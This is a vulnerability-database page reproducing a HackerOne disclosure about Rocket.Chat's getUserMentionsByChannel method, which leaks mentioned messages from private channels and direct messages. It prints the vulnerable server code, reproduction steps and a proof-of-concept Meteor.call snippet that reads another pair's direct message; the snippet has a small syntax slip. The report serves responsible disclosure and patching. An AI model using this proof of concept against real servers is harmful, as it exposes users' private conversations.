Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
hackeroneGronkeH1:1410246
HistoryNov 25, 2021 - 3:00 p.m.

Rocket.Chat: getUserMentionsByChannel leaks messages with mention from private channel

2021-11-2515:00:53
gronke
hackerone.com
10
rocket.chat
getusermentionsbychannel
private channels
direct messages
information disclosure
vulnerability
authentication

EPSS

0.001

Percentile

32.8%

JSON

Summary

The getUserMentionsByChannel meteor server method discloses messages from private channels and direct messages regardless of the users access permission to the room.

Description

When calling the getUserMentionsByChannel method, the server does not check the users access to the given room and returns all messages the user has been mentioned in.

Meteor.call(
  "getUserMentionsByChannel",
  { roomId: "<TARGET_ROOM>" },
  console.log
);

The issue was found in app/mentions/server/methods/getUserMentionsByChannel.js#L7-L23 where roomId is verified to be a String only.

Meteor.methods({
	getUserMentionsByChannel({ roomId, options }) {
		check(roomId, String);

		if (!Meteor.userId()) {
			throw new Meteor.Error('error-invalid-user', 'Invalid user', { method: 'getUserMentionsByChannel' });
		}

		const room = Rooms.findOneById(roomId);

		if (!room) {
			throw new Meteor.Error('error-invalid-room', 'Invalid room', { method: 'getUserMentionsByChannel' });
		}

		const user = Users.findOneById(Meteor.userId());

		return Messages.findVisibleByMentionAndRoomId(user.username, roomId, options).fetch();
	},
});

The server will return all messages the requesting user has been @ mentioned in.

Releases Affected:

Steps To Reproduce (from initial installation to vulnerability):

  1. Login to Rocket.Chat
  2. Obtain Room Id
    1. Guess Direct Message roomId from User IDs
    2. Leak private Message ID with unknown vulnerability
  3. Call getUserMentionsByChannel with given { roomId: "<Value>" }
  4. Read messages where the own user was mentioned in console.log output

Supporting Material/References:

The following example leks a private message between two users to a third account trudy who performs the requests from the authenticated client disclosing a direct message between alice and bob.

Meteor.user().username
// > 'trudy'
let alice = 'kYfzDMQLyPFjS9ASb';
let bob = 'zZnrfd2RvcWhspr6S';
Meteor.call(
  "getUserMentionsByChannel",
  { roomId: `${alice}${bob} }, // direct message channel
  (err, data) => console.log(
  	data
  	  .map((m) => `${m._id} ${m.u.username} (${m.ts.toGMTString()}): ${m.msg}`)
  	  .join("\n")
  )
);
// > Yp6NoMZk34mnQZiBR alice (Thu, 25 Nov 2021 14:17:25 UTC): Mention @trudy somewhere

Meteor.call("getMessages", ["Yp6NoMZk34mnQZiBR"], (err, data) => console.log(err.message))
// > Not allowed [error-not-allowed]

Suggested mitigation

  • Check for permission to read messages from the room given in in { roomId } method argument.

Impact

Authenticated users can disclose all messages they were mentioned in from private channels and direct messages they should not have access to.

Fixed in

We have fix this issue in version 5.0>

Related

nvd 2
cve 2
cnvd 2
cvelist 2
prion 2
osv 2
nvd
nvd
CVE-2022-32220
2022-09-23 19:15:11
CVE-2022-35249
2022-09-23 19:15:14
cve
cve
CVE-2022-32220
2022-09-23 19:15:11
CVE-2022-35249
2022-09-23 19:15:14
cnvd
cnvd
Rocket.Chat getUserMentionsByChannel meteor server information leakage vulnerability
2022-09-28 00:00:00
Rocket.Chat getUserMentionsByChannel meteor server authorization issue vulnerability
2022-09-28 00:00:00
cvelist
cvelist
CVE-2022-32220
2022-09-23 18:28:14
CVE-2022-35249
2022-09-23 18:28:12
prion
prion
Information disclosure
2022-09-23 19:15:00
Information disclosure
2022-09-23 19:15:00
osv
osv
CVE-2022-32220
2022-09-23 19:15:11
CVE-2022-35249
2022-09-23 19:15:14

EPSS

0.001

Percentile

32.8%

JSON
Related for H1:1410246
nvd2cve2cnvd2cvelist2prion2osv2